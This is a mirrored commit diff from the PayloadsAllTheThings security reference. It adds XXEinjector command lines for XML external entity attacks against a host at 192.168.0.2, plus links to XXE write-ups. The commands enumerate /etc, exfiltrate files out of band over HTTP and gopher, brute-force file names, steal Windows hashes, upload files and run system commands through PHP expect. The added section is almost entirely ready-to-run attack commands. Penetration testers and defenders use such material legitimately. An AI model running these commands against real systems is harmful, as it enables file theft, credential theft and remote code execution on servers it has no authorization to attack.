mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
commit
b25694239b
@ -42,7 +42,31 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
|||||||
```
|
```
|
||||||
$ python3 230.py 2121
|
$ python3 230.py 2121
|
||||||
```
|
```
|
||||||
|
- [XXEinjector](https://github.com/enjoiz/XXEinjector)
|
||||||
|
```bash
|
||||||
|
# Enumerating /etc directory in HTTPS application:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
|
||||||
|
# Enumerating /etc directory using gopher for OOB method:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
|
||||||
|
# Second order exploitation:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
|
||||||
|
# Bruteforcing files using HTTP out of band method and netdoc protocol:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
|
||||||
|
# Enumerating using direct exploitation:
|
||||||
|
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
|
||||||
|
# Enumerating unfiltered ports:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
|
||||||
|
# Stealing Windows hashes:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
|
||||||
|
# Uploading files using Java jar:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
|
||||||
|
# Executing system commands using PHP expect:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
|
||||||
|
# Testing for XSLT injection:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
|
||||||
|
# Log requests only:
|
||||||
|
ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
|
||||||
|
```
|
||||||
|
|
||||||
## Detect the vulnerability
|
## Detect the vulnerability
|
||||||
|
|
||||||
@ -454,4 +478,4 @@ updating: xl/sharedStrings.xml (deflated 17%)
|
|||||||
* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
|
* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
|
||||||
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
||||||
- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
|
- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
|
||||||
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
||||||
|
Loading…
Reference in New Issue
Block a user